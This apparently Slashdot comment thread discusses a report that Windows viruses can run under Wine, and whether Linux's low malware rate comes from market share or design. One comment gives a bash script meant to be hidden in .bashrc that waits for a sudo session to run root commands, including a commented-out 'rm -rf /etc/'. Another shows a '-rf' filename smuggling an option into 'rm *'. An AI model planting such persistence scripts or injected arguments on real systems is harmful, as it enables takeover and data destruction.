Now Linux Can Get Viruses, Via Wine

fsufitch writes "Wine has advanced enough to make Linux not immune to Windows viruses. However, just like many Wine applications, it takes a bit of effort to get the program off the ground. Also, just like some Windows programs running via Wine, not all features may work — in this case, the crippling of the system, immunity to the task manager, identity theft, etc."

marketshare

[sopssa]

Haven't it always been pretty clear that Wine could run Windows viruses, as long as they don't use some weird low-level tricks (which admittedly many do)?

But for that matter, Linux doesn't have malware only because it's desktop share is next to nothing (not the same amount atleast, there are Linux viruses out too). Mac OSX has been getting more and more viruses lately as it's marketshare has been growing. So would Linux aswell if it ever gained more users.

As long as the OS isn't completely locked down from the user, there will be malware. Windows, Mac, or Linux cant defend you from that. But none of us really want a locked down OS. And as long as the users are stupid their computers will get infected.

It's just about the marketshare.

Re:marketshare

[sakdoctor]

But none of us really want a locked down OS

WTF?
Microsoft totally fucked up the principle of least privilege from day one. If they hadn't, the damage done by viruses/worms in the history of personal computing, would have been an order of magnitude less.

Re:marketshare

[wizardforce]

So what you're saying is that Linux should be just riddled with various types of malware in the server market because it is both the dominant player in that market and is a significant target considering the server market's importance. Reality seems to disagree with you.

Re:marketshare

To be fair, there's a significant effort to install backdoors/trojans on poorly configured linux machines, but the issue is that they're a much more difficult target as servers do not browse websites with IE nor do they open every attachment you send them via email.

What makes most machines insecure is the users, and since a server normally has only 1 very tech-saavy user, the only openings are in poorly configured services. I know that I had phpbb for a long time, and one day I put in a game playing mod (had some goofy things like achievements and little trophies), and I got hacked via a google search.

Fortunately the guy who installed it didn't finish off his attack by clearing his own history, and the server wasn't running as root, so he only got as far as screwing with the main page.

To say that the server market isn't continually targeted is disingenuous. It's just harder because it isn't operated by a ton of idiots (well, most of the time anyway).

Re:marketshare

[0100010001010011]

A link to all those hundreds of OS X viruses that are coming out?

Re:marketshare

[bhtooefr]

The problem is, for a home computer, you are your own sysadmin.

And then the dancing bunnies problem comes into play.

User: "Oooh, I can download this to see dancing bunnies." *downloads and executes malware*
Malware: *tries to install*
OS: "Malware needs root access to install. Please enter your root password." (Windows version of this would be "Cancel or Allow.")
User: *enters root password*
Malware: *infects system*
OS: *pwned*
User: *pwned*

Re:marketshare

[Runaway1956]

"But for that matter, Linux doesn't have malware only because it's desktop share is next to nothing"

I keep hearing that. Everyone says it so it must be true. But, I'm mindful of the fact that only a handful of viruses have EVER been written for Linux, and that the User can't infect the underlying system. It takes Root access to do so, something that is only now beginning to be true for Windows.

It seems that Windows is improving it's security model - but they still haven't caught up with Linux, despite what the fanboys might have to say. Unlike XP, it has always been possible to lock the User down pretty tightly, but still allow User to play any game on the system. More, it has almost always been possible to allow a User to install his games and applications in User Space. That isn't possible with Windows, even with Win 7. When I can create a dozen users, each of whom allows serious infections WITHIN HIS OWN ACCOUNT, but the Admin account remains untouched and unharmed, THEN Windows will be well on the road to having a meaningful security model.

Whatever - I'll believe the basic premise that Linux would be just as vulnerable as Windows if it had market share when I see it. To me, it seems the structure and the philosophy of Linux contradicts what common "wisdom" says.

Re:marketshare

[evilviper]

As long as the OS isn't completely locked down from the user, there will be malware.

If you operate as a non-privileged user, and there aren't gaping local root exploits, malware is pretty damn toothless.

Sure, it could still send out some e-mails, record your keystrokes, etc., but it will show up in `ps` just like any other process, and it will have to launch itself from a few standard few locations available, where it will be easy to find, and stop from running.

So, yes, Linux could have malware, but it would be the minor nuisance type, rather than the "everyone's infected, it's impossible to remove, and the internet is being brought to its knees" type.

Additionally, the problem with Linux viruses is that people get their software from a central repository, with cryptographic checksums and the like. The world would be very different if Windows users got all their software through WindowsUpdate, instead of constantly downloading crap from random websites.

Re:marketshare

[Zancarius]

Except on BSD systems, which only accept arguments before other arguments. This prevents someone from putting a file called -rf in a directory, so when you run rm * the -rf won't be expanded and treated as an argument.

Which BSD?

FreeBSD:

[vbox:example]$ ls -l
total 0
[vbox:example]$ touch -- file1 file2 file3 file4 -rf
[vbox:example]$ mkdir dir
[vbox:example]$ ls -l
total 2
-rw-r--r-- 1 test test 0 Oct 24 16:16 -rf
drwxr-xr-x 2 test test 512 Oct 24 16:16 dir
-rw-r--r-- 1 test test 0 Oct 24 16:16 file1
-rw-r--r-- 1 test test 0 Oct 24 16:16 file2
-rw-r--r-- 1 test test 0 Oct 24 16:16 file3
-rw-r--r-- 1 test test 0 Oct 24 16:16 file4
[vbox:example]$ rm *
[vbox:example]$ ls -l
total 0
-rw-r--r-- 1 test test 0 Oct 24 16:16 -rf

I assume you're talking about a specific shell or rm binary--AFAIK, they all exhibit the same behavior in recent releases.

Linux's distribution model helps though

[brunes69]

The way Linux software is distributed, makes it much less likely to get a virus. You know how many applications I have downloaded from random websites in the past 2 years for my Linux system? Maybe, 2. All of the rest are in the centrally managed, (hopefully) certified virus-free application repository, which is free for all.

The idea that a Linux user would download random stuff from a torrent or website is a pretty foreign concept. For me, and moth others, if it isn't in the repository, I don't bother - because there is probably something in the repository that suits my needs just as well or better anyway.

Re:Linux's distribution model helps though

[buchner.johannes]

You, and the majority of Linux users are delusional. You think malware is only executables. A glitch in any software package -- e.g. Firefox or OpenOffice -- would be enough to add a bash script to .bashrc (or replace the file). This can download and start all the software it wants, unless you set the /home partition noexec.
Another attack method would be to append a script to the GNOME startup applications.

Consider appending the following script to .bashrc (no one ever looks in there). Next time you go into your shell and do "sudo su - " or something similar, the script has root privileges (if you use sudo timeouts or no sudo password).
#!/bin/bash

MAXAGE=100

while sleep 10; do

        pgrep -f -U 0 -P $PPID,$$ && {
                # echo parent has a root owned child process
                id=$(pgrep -f -U 0 -P $PPID,$$ | head -n1)
                # wait $id
                age=$(($(date +%s) - $(stat /proc/$id/ -c '%Y')))
                if [ "$age" -lt "$MAXAGE" ]; then
                        # echo the child is young
                        # evil code here
                        sudo touch /root/you_were_hacked
                        # sudo rm -rf /etc/
                fi
        }
done &

With 10+ scripting languages on the average Linux install, the attacker has plenty of choices. Linux is only safer if you use a hardened kernel, SELinux, noexec partitions and read-only binary partitions. Crackers are already laughing about the upcoming, unworried lusers that think their OS is invulnerable.

Windows virus needs help to limp onto WINE

[AliasMarlowe]

So WINE can get a virus intended for Windows, if you jump through some hoops to help the virus along. Color me unworried.

What can a Windows-targeted virus in WINE do to a Linux system, other than hang around looking impotent? Most of the target DLLs and other windows hidey-holes don't exist in WINE. Even if it finds a place to lurk, it's unlikely that it could hit the Linux system files or boot loader, or perform keylogging outside WINE or snoop on private files. A very crude "wipe drive C:" type virus might molest your WINE environment (your data files are elsewhere, of course), but that's about all. Even if the virus were specifically tailored for WINE on Linux, a successful attack would rely on user stupidity even more blatant than Windows viruses must depend on.

TFA even commented on how easy it is to dispose of the malware, even after spending some effort helping it to limp onto your system.

Re:Windows virus needs help to limp onto WINE

[Bert64]

The beauty of wine, is that you can configure multiple wine instances which are segregated from each other, so a virus infecting one won't affect another... Also, since wine is a userland program which is only invoked at the user's request, any malware shouldn't be able to make itself load at boot.

Incidentally, small desktop marketshare is not the only reason, windows has traditionally been more susceptible to viruses due to various design decisions which don't apply to linux, various factors like hiding of file extensions, users being admin by default, files being executable purely based on their filename (linux users have to chmod something first), and the basic fact that windows has its origins in a single user gui addon for dos which had no concept of security whatsoever (yes i know nt does, but they grafted the old 9x interface and apis on top, which fundamentally weakened the security model inherent in nt).

Re:Just get hacked, it is easier anyway

[argent]

Linux isn't THAT more secure, it is just less targeted since Windows is 90%+ of the computers.

A properly configured UNIX client system is significantly more secure than any comparable Windows system, even if you don't run a firewall. There are two significant differences: Internet Explorer, and Services.

The security model of IE is inherently flawed and can not be fixed without breaking existing applications. Microsoft is unwilling to take that step.

Windows services are neither run from a superserver nor in virtually all cases do they allow binding to specific ports, and Windows networking (LAN Manager) requires having services with open ports.

These are fairly significant problems that can not be addressed without changes to Windows APIs that are unlikely to happen.

I think Apple is about to learn a real lesson with the iPhone being hacked constantly.

If someone has physical access to the system, all the software security in the world is useless. The iPhone is being attacked by the device's *owners*. These are *local exploits*, much more common and of much less concern than remote ones.

Re:not just marketshare

[lukas84]

You mean just like Internet Explorer has been doing since the End of 2006?